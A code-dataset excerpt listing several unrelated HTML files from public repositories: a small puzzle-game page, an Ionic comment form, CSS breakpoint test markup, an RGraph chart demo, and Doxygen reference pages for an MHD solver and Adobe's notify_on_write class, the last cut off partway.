path
stringlengths 5
312
| repo_name
stringlengths 5
116
| content
stringlengths 2
1.04M
|
---|---|---|
TAIHAO2019/pub/SmallGame/AsFastAsYouCan2/c0d637f39e0ed5e11830f0c08e3527e153032ada80e872319f1f8e35cd99a188.html
|
simonmysun/praxis
|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>18 --> 19</title>
<link href="./../../assets/style.css" rel="stylesheet">
</head>
<body>
<h2>You have to be fast</h2>
<a href="./7b7cec7a5f28f839d9f70ca841d995dfc85c8394138b4031ede7aae42eeeb512.html">Teleport</a>
<hr>
<a href="./../../about.md">About</a> (Spoilers! )
<script src="./../../assets/md5.js"></script>
<script>
window.currentLevel = 7;
</script>
<script src="./../../assets/script.js"></script>
</body>
</html>
|
Hybrid-class/conFusion/www/templates/dish-comment.html
|
hellozts4120/FullStack-HKUST
|
<ion-modal-view>
<ion-header-bar>
<h1 class="title">Submit Comment on Dish</h1>
<div class="buttons">
<button class="button button-clear" ng-click="closeCommentModal()">Close</button>
</div>
</ion-header-bar>
<ion-content>
<form id="commentForm" name="commentForm" ng-submit="submitComment()">
<div class="list">
<label class="item item-input item-select">
<span class="input-label">Rating</span>
<select ng-model="comment.rating">
<option ng-repeat="n in [1,2,3,4,5]" value="{{n}}">{{n}}</option>
</select>
</label>
<label class="item item-input">
<span class="input-label">Your Name</span>
<input ng-model="comment.author">
</label>
<label class="item item-input">
<span class="input-label">Your Comment</span>
<textarea ng-model="comment.comment"></textarea>
</label>
<label class="item">
<button class="button button-block button-positive" type="submit">Submit</button>
</label>
</div>
</form>
</ion-content>
</ion-modal-view>
|
test/partials/devices.html
|
Flywheel-Co/flywheel-adapt
|
<section id="devices">
<h2>Devices</h2>
<div class="device-group row">
<div class="col col-12 col-blue device-item lte-ultrawide"><div class="label"><code>lte-ultrawide</code></div></div>
<div class="col col-12 col-blue device-item lte-desktop"><div class="label"><code>lte-desktop</code></div></div>
<div class="col col-12 col-blue device-item lte-tablet"><div class="label"><code>lte-tablet</code></div></div>
<div class="col col-12 col-blue device-item lte-mobile"><div class="label"><code>lte-mobile</code></div></div>
</div>
<div class="device-group row">
<div class="col col-12 col-green device-item lt-ultrawide"><div class="label"><code>lt-ultrawide</code></div></div>
<div class="col col-12 col-green device-item lt-desktop"><div class="label"><code>lt-desktop</code></div></div>
<div class="col col-12 col-green device-item lt-tablet"><div class="label"><code>lt-tablet</code></div></div>
<div class="col col-12 col-green device-item lt-mobile"><div class="label"><code>lt-mobile</code></div></div>
</div>
<div class="device-group row">
<div class="col col-12 col-yellow device-item gte-ultrawide"><div class="label"><code>gte-ultrawide</code></div></div>
<div class="col col-12 col-yellow device-item gte-desktop"><div class="label"><code>gte-desktop</code></div></div>
<div class="col col-12 col-yellow device-item gte-tablet"><div class="label"><code>gte-tablet</code></div></div>
<div class="col col-12 col-yellow device-item gte-mobile"><div class="label"><code>gte-mobile</code></div></div>
</div>
<div class="device-group row">
<div class="col col-12 col-red device-item gt-ultrawide"><div class="label"><code>gt-ultrawide</code></div></div>
<div class="col col-12 col-red device-item gt-desktop"><div class="label"><code>gt-desktop</code></div></div>
<div class="col col-12 col-red device-item gt-tablet"><div class="label"><code>gt-tablet</code></div></div>
<div class="col col-12 col-red device-item gt-mobile"><div class="label"><code>gt-mobile</code></div></div>
</div>
<div class="device-group row">
<div class="col col-12 col-blue device-item between-desktop-ultrawide"><div class="label"><code>between-desktop-ultrawide</code></div></div>
<div class="col col-12 col-blue device-item between-tablet-desktop"><div class="label"><code>between-tablet-desktop</code></div></div>
<div class="col col-12 col-blue device-item between-phone-tablet"><div class="label"><code>between-phone-tablet</code></div></div>
</div>
<br>
<h3>Device CSS Classes</h3>
<div class="row device-class-group">
<div class="col col-3 col-blue show-ultrawide"><div class="label"><code>.show-ultrawide</code></div></div>
<div class="col col-3 col-blue show-desktop"><div class="label"><code>.show-desktop</code></div></div>
<div class="col col-3 col-blue show-tablet"><div class="label"><code>.show-tablet</code></div></div>
<div class="col col-3 col-blue show-mobile"><div class="label"><code>.show-mobile</code></div></div>
</div>
<div class="row device-class-group">
<div class="col col-3 col-yellow hide-ultrawide"><div class="label"><code>.hide-ultrawide</code></div></div>
<div class="col col-3 col-yellow hide-desktop"><div class="label"><code>.hide-desktop</code></div></div>
<div class="col col-3 col-yellow hide-tablet"><div class="label"><code>.hide-tablet</code></div></div>
<div class="col col-3 col-yellow hide-mobile"><div class="label"><code>.hide-mobile</code></div></div>
</div>
<div class="row device-class-group">
<div class="col col-3 col-green show-gt-ultrawide"><div class="label"><code>.show-gt-ultrawide</code></div></div>
<div class="col col-3 col-green show-gt-desktop"><div class="label"><code>.show-gt-desktop</code></div></div>
<div class="col col-3 col-green show-gt-tablet"><div class="label"><code>.show-gt-tablet</code></div></div>
<div class="col col-3 col-green show-gt-mobile"><div class="label"><code>.show-gt-mobile</code></div></div>
</div>
</section>
|
doc/html/functions_vars_p.html
|
garethcmurphy/mhdvanleer
|
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.13"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<title>MyProject: Class Members - Variables</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="navtree.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="resize.js"></script>
<script type="text/javascript" src="navtreedata.js"></script>
<script type="text/javascript" src="navtree.js"></script>
<script type="text/javascript">
$(document).ready(initResizable);
</script>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/searchdata.js"></script>
<script type="text/javascript" src="search/search.js"></script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td id="projectalign" style="padding-left: 0.5em;">
<div id="projectname">MyProject
</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.13 -->
<script type="text/javascript">
var searchBox = new SearchBox("searchBox", "search",false,'Search');
</script>
<script type="text/javascript" src="menudata.js"></script>
<script type="text/javascript" src="menu.js"></script>
<script type="text/javascript">
$(function() {
initMenu('',true,false,'search.php','Search');
$(document).ready(function() { init_search(); });
});
</script>
<div id="main-nav"></div>
</div><!-- top -->
<div id="side-nav" class="ui-resizable side-nav-resizable">
<div id="nav-tree">
<div id="nav-tree-contents">
<div id="nav-sync" class="sync"></div>
</div>
</div>
<div id="splitbar" style="-moz-user-select:none;"
class="ui-resizable-handle">
</div>
</div>
<script type="text/javascript">
$(document).ready(function(){initNavTree('functions_vars_p.html','');});
</script>
<div id="doc-content">
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
onkeydown="return searchBox.OnSearchSelectKey(event)">
</div>
<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0"
name="MSearchResults" id="MSearchResults">
</iframe>
</div>
<div class="contents">
 
<h3><a id="index_p"></a>- p -</h3><ul>
<li>p
: <a class="el" href="classEigen.html#a06929fb8d011df1c58fde1486e54a7a1">Eigen</a>
, <a class="el" href="classRiemann.html#ad5cdb1fbb2149bcbdbfea4591d235412">Riemann</a>
</li>
<li>p_magnetic
: <a class="el" href="classRiemann.html#ae942c6053a769d20c4adfd20781b3173">Riemann</a>
</li>
<li>p_rl
: <a class="el" href="classRiemann.html#acc72f10af19015784ef3b24b4f816651">Riemann</a>
</li>
<li>phi
: <a class="el" href="classEigen.html#a205ed994f4da55a9663a1cf8ddac34fa">Eigen</a>
</li>
<li>pie
: <a class="el" href="classEigen.html#a71253de919978058cd2b94e7834b019f">Eigen</a>
</li>
<li>pl
: <a class="el" href="classRoe.html#a3c095fb6ac32aab0777a9438ae87ecb6">Roe</a>
</li>
<li>pll
: <a class="el" href="classFluxCalc.html#ac7b46a7fb4c9b8ebcb5fbfb6bba8c7e7">FluxCalc</a>
</li>
<li>plm
: <a class="el" href="classFluxCalc.html#aa6810dc21bde1993624ea0d3fe15b4a3">FluxCalc</a>
</li>
<li>plr
: <a class="el" href="classFluxCalc.html#a36875143a7a7c560b17570c77624514e">FluxCalc</a>
</li>
<li>pr
: <a class="el" href="classRoe.html#a192ea3de117ed94fe04d244cb2174785">Roe</a>
</li>
<li>pressure
: <a class="el" href="classRadiativeCooling.html#a0c52edb57f85fdc2567203a1ee74b924">RadiativeCooling</a>
</li>
<li>prl
: <a class="el" href="classRoe.html#a45fef8454e2149fda58bcd64ae4a9f58">Roe</a>
</li>
<li>prr
: <a class="el" href="classFluxCalc.html#ab4e7e09c84cf9dfc26961e60209ff4ff">FluxCalc</a>
</li>
<li>px
: <a class="el" href="classRadiativeCooling.html#a85ca1dbfd6e59c1e0cef1386ae8982b4">RadiativeCooling</a>
, <a class="el" href="classRoe.html#a02cb59599c38a21472777e9de7f6f1ed">Roe</a>
</li>
<li>py
: <a class="el" href="classRadiativeCooling.html#a77af20c4659490ae2f882b9ef677bf32">RadiativeCooling</a>
, <a class="el" href="classRoe.html#a4d74b032fc909bf6b50989bacd908e03">Roe</a>
</li>
</ul>
</div><!-- contents -->
</div><!-- doc-content -->
<!-- start footer part -->
<div id="nav-path" class="navpath"><!-- id is needed for treeview function! -->
<ul>
<li class="footer">Generated by
<a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/></a> 1.8.13 </li>
</ul>
</div>
</body>
</html>
|
IASS/IASS_BASIC/IASS_Server/html/RGraph/demos/bar-interactive-key.html
|
LinkItONEDevGroup/LASS
|
<!DOCTYPE html >
<html>
<head>
<script src="../libraries/RGraph.common.core.js" ></script>
<script src="../libraries/RGraph.common.dynamic.js" ></script>
<script src="../libraries/RGraph.common.key.js" ></script>
<script src="../libraries/RGraph.drawing.rect.js" ></script>
<script src="../libraries/RGraph.bar.js" ></script>
<title>An example of a Bar chart with an interactive key</title>
<link rel="stylesheet" href="demos.css" type="text/css" media="screen" />
<meta name="robots" content="noindex,nofollow" />
<meta name="description" content="An example of a Bar chart with an interactive key" />
</head>
<body>
<h1>An example of a Bar chart with an interactive key</h1>
<p>
The interactive key has been re-implemented as of June 2013 and added to more chart types.
</p>
<canvas id="cvs" width="800" height="250">[No canvas support]</canvas>
<script>
window.onload = function ()
{
var bar = new RGraph.Bar({
id: 'cvs',
data: [[8,4,1],[4,8,8],[1,2,2],[3,3,4],[6,5,2],[5,8,8],[4,8,5]],
options: {
key: ['Jim','Jack','Joseph'],
keyInteractive: true,
keyTextSize: 14,
keyPosition: 'gutter',
backgroundGridVlines: false,
backgroundGridBorder: false,
shadow: false,
labels: ['Monday','Tuesday','Wednesday','Thursday','Friday','Saturday','Sunday'],
textSize:14,
strokestyle: 'rgba(0,0,0,0)',
hmargin: 25,
hmarginGrouped: 2,
noyaxis: true
}
}).draw()
};
</script>
<p></p>
This goes in the documents header:
<pre class="code">
<script src="RGraph.common.core.js"></script>
<script src="RGraph.common.dynamic.js"></script>
<script src="RGraph.common.key.js"></script>
<script src="RGraph.drawing.rect.js"></script>
<script src="RGraph.bar.js"></script>
</pre>
Put this where you want the chart to show up:
<pre class="code">
<canvas id="cvs" width="800" height="250">
[No canvas support]
</canvas>
</pre>
This is the code that generates the chart:
<pre class="code">
<script>
window.onload = function ()
{
var bar = new RGraph.Bar({
id: 'cvs',
data: [[8,4,1],[4,8,8],[1,2,2],[3,3,4],[6,5,2],[5,8,8],[4,8,5]],
options: {
key: ['Jim','Jack','Joseph'],
keyInteractive: true,
keyTextSize: 14,
keyPosition: 'gutter',
backgroundGridVlines: false,
backgroundGridBorder: false,
shadow: false,
labels: ['Monday','Tuesday','Wednesday','Thursday','Friday','Saturday','Sunday'],
textSize:14,
strokestyle: 'rgba(0,0,0,0)',
hmargin: 25,
hmarginGrouped: 2,
noyaxis: true
}
}).draw()
};
</script>
</pre>
<p>
<a href="https://www.facebook.com/sharer/sharer.php?u=http://www.rgraph.net" target="_blank" onclick="window.open('https://www.facebook.com/sharer/sharer.php?u=http://www.rgraph.net', null, 'top=50,left=50,width=600,height=368'); return false"><img src="../images/facebook-large.png" width="200" height="43" alt="Share on Facebook" border="0" title="Visit the RGraph Facebook page" /></a>
<a href="https://twitter.com/_rgraph" target="_blank" onclick="window.open('https://twitter.com/_rgraph', null, 'top=50,left=50,width=700,height=400'); return false"><img src="../images/twitter-large.png" width="200" height="43" alt="Share on Twitter" border="0" title="Mention RGraph on Twitter" /></a>
</p>
<a href="./"><Back</a><br />
</body>
</html>
|
documentation/html/classadobe_1_1notify__on__write.html
|
brycelelbach/asl
|
<!--
Copyright 2005-2008 Adobe Systems Incorporated
Distributed under the MIT License (see accompanying file LICENSE_1_0_0.txt
or a copy at http://stlab.adobe.com/licenses.html)
Some files are held under additional license.
Please see "http://stlab.adobe.com/licenses.html" for more information.
-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<TITLE>Adobe Software Technology Lab: notify_on_write< T, Notifier > Class Template Reference</TITLE>
<META HTTP-EQUIV="content-type" CONTENT="text/html;charset=ISO-8859-1"/>
<LINK TYPE="text/css" REL="stylesheet" HREF="adobe_source.css"/>
<LINK REL="alternate" TITLE="stlab.adobe.com RSS" HREF="http://sourceforge.net/export/rss2_projnews.php?group_id=132417&rss_fulltext=1" TYPE="application/rss+xml"/>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
</head>
<body>
<div id='content'>
<table><tr>
<td colspan='5'>
<div id='opensource_banner'>
<table style='width: 100%; padding: 5px;'><tr>
<td align='left'>
<a href='index.html' style='border: none'><img src='stlab2007.jpg' alt="stlab.adobe.com"/></a>
</td>
<td align='right'>
<a href='http://www.adobe.com' style='border: none'><img src='adobe_hlogo.gif' alt="Adobe Systems Incorporated"/></a>
</td>
</tr></table>
</div>
</td></tr><tr>
<td valign="top">
<div id='navtable' height='100%'>
<div style='margin: 5px'>
<h4>Documentation</h4>
<a href="group__asl__overview.html">Overview</a><br/>
<a href="asl_readme.html">Building ASL</a><br/>
<a href="asl_toc.html">Documentation</a><br/>
<a href="http://stlab.adobe.com/wiki/index.php/Supplementary_ASL_Documentation">Library Wiki Docs</a><br/>
<a href="asl_indices.html">Indices</a><br/>
<a href="http://stlab.adobe.com/perforce/">Browse Perforce</a><br/>
<h4>More Info</h4>
<a href="asl_release_notes.html">Release Notes</a><br/>
<a href="http://stlab.adobe.com/wiki/">Wiki</a><br/>
<a href="asl_search.html">Site Search</a><br/>
<a href="licenses.html">License</a><br/>
<a href="success_stories.html">Success Stories</a><br/>
<a href="asl_contributors.html">Contributors</a><br/>
<h4>Media</h4>
<a href="http://sourceforge.net/project/showfiles.php?group_id=132417&package_id=145420">Download</a><br/>
<a href="asl_download_perforce.html">Perforce Depots</a><br/>
<h4>Support</h4>
<a href="http://sourceforge.net/projects/adobe-source/">ASL SourceForge Home</a><br/>
<a href="http://sourceforge.net/mail/?group_id=132417">Mailing Lists</a><br/>
<a href="http://sourceforge.net/forum/?group_id=132417">Discussion Forums</a><br/>
<a href="http://sourceforge.net/tracker/?atid=724218&group_id=132417&func=browse">Report Bugs</a><br/>
<a href="http://sourceforge.net/tracker/?atid=724221&group_id=132417&func=browse">Suggest Features</a><br/>
<a href="asl_contributing.html">Contribute to ASL</a><br/>
<h4>RSS</h4>
<a href="http://sourceforge.net/export/rss2_projnews.php?group_id=132417">Short-text news</a><br/>
<a href="http://sourceforge.net/export/rss2_projnews.php?group_id=132417&rss_fulltext=1">Full-text news</a><br/>
<a href="http://sourceforge.net/export/rss2_projfiles.php?group_id=132417">File releases</a><br/>
<h4>Other Adobe Projects</h4>
<a href="http://sourceforge.net/adobe/">Open @ Adobe</a><br/>
<a href="http://opensource.adobe.com/">Adobe Open Source</a><br/>
<a href="http://labs.adobe.com/">Adobe Labs</a><br/>
<a href="http://stlab.adobe.com/amg/">Adobe Media Gallery</a><br/>
<a href="http://stlab.adobe.com/performance/">C++ Benchmarks</a><br/>
<h4>Other Resources</h4>
<a href="http://boost.org">Boost</a><br/>
<a href="http://www.riaforge.com/">RIAForge</a><br/>
<a href="http://www.sgi.com/tech/stl">SGI STL</a><br/>
</div>
</div>
</td>
<td id='maintable' width="100%" valign="top">
<!-- End Header -->
<!-- Generated by Doxygen 1.7.2 -->
<div class="navpath">
<ul>
<li><a class="el" href="namespaceadobe.html">adobe</a> </li>
<li><a class="el" href="classadobe_1_1notify__on__write.html">notify_on_write</a> </li>
</ul>
</div>
<div class="header">
<div class="summary">
<a href="#pub-types">Public Types</a> |
<a href="#pub-methods">Public Member Functions</a> </div>
<div class="headertitle">
<h1>notify_on_write< T, Notifier > Class Template Reference</h1> </div>
</div>
<div class="contents">
<!-- doxytag: class="adobe::notify_on_write" -->
<p><code>#include <<a class="el" href="notify__on__write_8hpp_source.html">notify_on_write.hpp</a>></code></p>
<p><a href="classadobe_1_1notify__on__write-members.html">List of all members.</a></p>
<table class="memberdecls">
<tr><td colspan="2"><h2><a name="pub-types"></a>
Public Types</h2></td></tr>
<tr><td class="memItemLeft" align="right" valign="top">typedef Notifier </td><td class="memItemRight" valign="bottom"><a class="el" href="classadobe_1_1notify__on__write.html#aee8494f9e7d2e2da35038bef5e861e9e">notifier_type</a></td></tr>
<tr><td class="memItemLeft" align="right" valign="top">typedef <a class="el" href="classadobe_1_1notify__on__write.html">notify_on_write</a><br class="typebreak"/>
< <a class="el" href="classadobe_1_1notify__on__write.html#a265a253612b46abed17c61b0a5e5ce30">value_type</a>, <a class="el" href="classadobe_1_1notify__on__write.html#aee8494f9e7d2e2da35038bef5e861e9e">notifier_type</a> > </td><td class="memItemRight" valign="bottom"><a class="el" href="classadobe_1_1notify__on__write.html#a0e42bc619fb49790609653d2dd34130f">self_type</a></td></tr>
<tr><td class="memItemLeft" align="right" valign="top">typedef T </td><td class="memItemRight" valign="bottom"><a class="el" href="classadobe_1_1notify__on__write.html#a265a253612b46abed17c61b0a5e5ce30">value_type</a></td></tr>
<tr><td colspan="2"><h2><a name="pub-methods"></a>
Public Member Functions</h2></td></tr>
<tr><td class="memItemLeft" align="right" valign="top"> </td><td class="memItemRight" valign="bottom"><a class="el" href="classadobe_1_1notify__on__write.html#a93e3d42165b34d5c7bc3172abb7a549d">notify_on_write</a> (const <a class="el" href="classadobe_1_1notify__on__write.html#a265a253612b46abed17c61b0a5e5ce30">value_type</a> &x=<a class="el" href="classadobe_1_1notify__on__write.html#a265a253612b46abed17c61b0a5e5ce30">value_type</a>(), const Notifier &notifier=<a class="el" href="classadobe_1_1notify__on__write.html#aee8494f9e7d2e2da35038bef5e861e9e">notifier_type</a>())</td></tr>
<tr><td class="memItemLeft" align="right" valign="top"> </td><td class="memItemRight" valign="bottom"><a class="el" href="classadobe_1_1notify__on__write.html#a1fbf19f37e7696c505d00121fd44200c">notify_on_write</a> (const <a class="el" href="classadobe_1_1notify__on__write.html">notify_on_write</a> &rhs)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top"> </td><td class="memItemRight" valign="bottom"><a class="el" href="classadobe_1_1notify__on__write.html#ae98e7ba0b9abd03f04c22b14c6d018be">operator const value_type &</a> () const </td></tr>
<tr><td class="memItemLeft" align="right" valign="top">const <a class="el" href="classadobe_1_1notify__on__write.html#a265a253612b46abed17c61b0a5e5ce30">value_type</a> & </td><td class="memItemRight" valign="bottom"><a class="el" href="classadobe_1_1notify__on__write.html#a00f38caf242284b4de8f490b2e33c959">operator*</a> () const </td></tr>
<tr><td class="memItemLeft" align="right" valign="top">const <a class="el" href="classadobe_1_1notify__on__write.html#a265a253612b46abed17c61b0a5e5ce30">value_type</a> * </td><td class="memItemRight" valign="bottom"><a class="el" href="classadobe_1_1notify__on__write.html#a297342b08b4a6f7cf63e3d29e203858f">operator-></a> () const </td></tr>
<tr><td class="memItemLeft" align="right" valign="top"><a class="el" href="classadobe_1_1notify__on__write.html">notify_on_write</a> & </td><td class="memItemRight" valign="bottom"><a class="el" href="classadobe_1_1notify__on__write.html#a77c52e18ce1757f430ed9120a4efd830">operator=</a> (const <a class="el" href="classadobe_1_1notify__on__write.html">notify_on_write</a> &x)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top"><a class="el" href="classadobe_1_1notify__on__write.html">notify_on_write</a> & </td><td class="memItemRight" valign="bottom"><a class="el" href="classadobe_1_1notify__on__write.html#a6b253c5e14b4a4a80abde7530463a59e">operator=</a> (const <a class="el" href="classadobe_1_1notify__on__write.html#a265a253612b46abed17c61b0a5e5ce30">value_type</a> &x)</td></tr>
<tr><td class="memTemplParams" colspan="2">template<typename UnaryFunction > </td></tr>
<tr><td class="memTemplItemLeft" align="right" valign="top">void </td><td class="memTemplItemRight" valign="bottom"><a class="el" href="classadobe_1_1notify__on__write.html#a3595c509dd4b3cad658dd7a1745a5880">write</a> (UnaryFunction proc)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top"> </td><td class="memItemRight" valign="bottom"><a class="el" href="classadobe_1_1notify__on__write.html#ae6ace03ec5aef6cb487492fa2c7f0252">~notify_on_write</a> ()</td></tr>
</table>
<hr/><a name="_details"></a><h2>Detailed Description</h2>
<h3>template<typename T, typename Notifier><br/>
class adobe::notify_on_write< T, Notifier ></h3>
<p>Definition at line <a class="el" href="notify__on__write_8hpp_source.html#l00025">25</a> of file <a class="el" href="notify__on__write_8hpp_source.html">notify_on_write.hpp</a>.</p>
<hr/><h2>Member Typedef Documentation</h2>
<a class="anchor" id="aee8494f9e7d2e2da35038bef5e861e9e"></a><!-- doxytag: member="adobe::notify_on_write::notifier_type" ref="aee8494f9e7d2e2da35038bef5e861e9e" args="" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">typedef Notifier <a class="el" href="classadobe_1_1notify__on__write.html#aee8494f9e7d2e2da35038bef5e861e9e">notifier_type</a></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Definition at line <a class="el" href="notify__on__write_8hpp_source.html#l00029">29</a> of file <a class="el" href="notify__on__write_8hpp_source.html">notify_on_write.hpp</a>.</p>
</div>
</div>
<a class="anchor" id="a0e42bc619fb49790609653d2dd34130f"></a><!-- doxytag: member="adobe::notify_on_write::self_type" ref="a0e42bc619fb49790609653d2dd34130f" args="" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">typedef <a class="el" href="classadobe_1_1notify__on__write.html">notify_on_write</a><<a class="el" href="classadobe_1_1notify__on__write.html#a265a253612b46abed17c61b0a5e5ce30">value_type</a>, <a class="el" href="classadobe_1_1notify__on__write.html#aee8494f9e7d2e2da35038bef5e861e9e">notifier_type</a>> <a class="el" href="classadobe_1_1notify__on__write.html">self_type</a></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Definition at line <a class="el" href="notify__on__write_8hpp_source.html#l00030">30</a> of file <a class="el" href="notify__on__write_8hpp_source.html">notify_on_write.hpp</a>.</p>
</div>
</div>
<a class="anchor" id="a265a253612b46abed17c61b0a5e5ce30"></a><!-- doxytag: member="adobe::notify_on_write::value_type" ref="a265a253612b46abed17c61b0a5e5ce30" args="" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">typedef T <a class="el" href="classadobe_1_1notify__on__write.html#a265a253612b46abed17c61b0a5e5ce30">value_type</a></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Definition at line <a class="el" href="notify__on__write_8hpp_source.html#l00028">28</a> of file <a class="el" href="notify__on__write_8hpp_source.html">notify_on_write.hpp</a>.</p>
</div>
</div>
<hr/><h2>Constructor & Destructor Documentation</h2>
<a class="anchor" id="a93e3d42165b34d5c7bc3172abb7a549d"></a><!-- doxytag: member="adobe::notify_on_write::notify_on_write" ref="a93e3d42165b34d5c7bc3172abb7a549d" args="(const value_type &x=value_type(), const Notifier &notifier=notifier_type())" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname"><a class="el" href="classadobe_1_1notify__on__write.html">notify_on_write</a> </td>
<td>(</td>
<td class="paramtype">const <a class="el" href="classadobe_1_1notify__on__write.html#a265a253612b46abed17c61b0a5e5ce30">value_type</a> & </td>
<td class="paramname"> <em>x</em> = <code><a class="el" href="classadobe_1_1notify__on__write.html#a265a253612b46abed17c61b0a5e5ce30">value_type</a>()</code>, </td>
</tr>
<tr>
<td class="paramkey"></td>
<td></td>
<td class="paramtype">const Notifier & </td>
<td class="paramname"> <em>notifier</em> = <code><a class="el" href="classadobe_1_1notify__on__write.html#aee8494f9e7d2e2da35038bef5e861e9e">notifier_type</a>()</code> </td>
</tr>
<tr>
<td></td>
<td>)</td>
<td></td><td><code> [explicit]</code></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Definition at line <a class="el" href="notify__on__write_8hpp_source.html#l00032">32</a> of file <a class="el" href="notify__on__write_8hpp_source.html">notify_on_write.hpp</a>.</p>
</div>
</div>
<a class="anchor" id="a1fbf19f37e7696c505d00121fd44200c"></a><!-- doxytag: member="adobe::notify_on_write::notify_on_write" ref="a1fbf19f37e7696c505d00121fd44200c" args="(const notify_on_write &rhs)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname"><a class="el" href="classadobe_1_1notify__on__write.html">notify_on_write</a> </td>
<td>(</td>
<td class="paramtype">const <a class="el" href="classadobe_1_1notify__on__write.html">notify_on_write</a>< T, Notifier > & </td>
<td class="paramname"> <em>rhs</em> )</td>
<td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Definition at line <a class="el" href="notify__on__write_8hpp_source.html#l00038">38</a> of file <a class="el" href="notify__on__write_8hpp_source.html">notify_on_write.hpp</a>.</p>
</div>
</div>
<a class="anchor" id="ae6ace03ec5aef6cb487492fa2c7f0252"></a><!-- doxytag: member="adobe::notify_on_write::~notify_on_write" ref="ae6ace03ec5aef6cb487492fa2c7f0252" args="()" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">~<a class="el" href="classadobe_1_1notify__on__write.html">notify_on_write</a> </td>
<td>(</td>
<td class="paramname"> )</td>
<td></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Definition at line <a class="el" href="notify__on__write_8hpp_source.html#l00043">43</a> of file <a class="el" href="notify__on__write_8hpp_source.html">notify_on_write.hpp</a>.</p>
</div>
</div>
<hr/><h2>Member Function Documentation</h2>
<a class="anchor" id="ae98e7ba0b9abd03f04c22b14c6d018be"></a><!-- doxytag: member="adobe::notify_on_write::operator const value_type &" ref="ae98e7ba0b9abd03f04c22b14c6d018be" args="() const " -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">operator const <a class="el" href="classadobe_1_1notify__on__write.html#a265a253612b46abed17c61b0a5e5ce30">value_type</a> & </td>
<td>(</td>
<td class="paramname"> )</td>
<td> const</td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Definition at line <a class="el" href="notify__on__write_8hpp_source.html#l00069">69</a> of file <a class="el" href="notify__on__write_8hpp_source.html">notify_on_write.hpp</a>.</p>
</div>
</div>
<a class="anchor" id="a00f38caf242284b4de8f490b2e33c959"></a><!-- doxytag: member="adobe::notify_on_write::operator*" ref="a00f38caf242284b4de8f490b2e33c959" args="() const " -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">const <a class="el" href="classadobe_1_1notify__on__write.html#a265a253612b46abed17c61b0a5e5ce30">value_type</a>& operator* </td>
<td>(</td>
<td class="paramname"> )</td>
<td> const</td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Definition at line <a class="el" href="notify__on__write_8hpp_source.html#l00072">72</a> of file <a class="el" href="notify__on__write_8hpp_source.html">notify_on_write.hpp</a>.</p>
</div>
</div>
<a class="anchor" id="a297342b08b4a6f7cf63e3d29e203858f"></a><!-- doxytag: member="adobe::notify_on_write::operator->" ref="a297342b08b4a6f7cf63e3d29e203858f" args="() const " -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">const <a class="el" href="classadobe_1_1notify__on__write.html#a265a253612b46abed17c61b0a5e5ce30">value_type</a>* operator-> </td>
<td>(</td>
<td class="paramname"> )</td>
<td> const</td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Definition at line <a class="el" href="notify__on__write_8hpp_source.html#l00073">73</a> of file <a class="el" href="notify__on__write_8hpp_source.html">notify_on_write.hpp</a>.</p>
</div>
</div>
<a class="anchor" id="a77c52e18ce1757f430ed9120a4efd830"></a><!-- doxytag: member="adobe::notify_on_write::operator=" ref="a77c52e18ce1757f430ed9120a4efd830" args="(const notify_on_write &x)" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname"><a class="el" href="classadobe_1_1notify__on__write.html">notify_on_write</a>& operator= </td>
<td>(</td>
<td class="paramtype">const <a class="el" href="classadobe_1_1notify__on__write.html">notify_on_write</a>< T, Notifier > & </td>
<td class="paramname"> <em>x</em> )</td>
<td></td>
</tr>
</table>
</div>
<div class="memdoc">
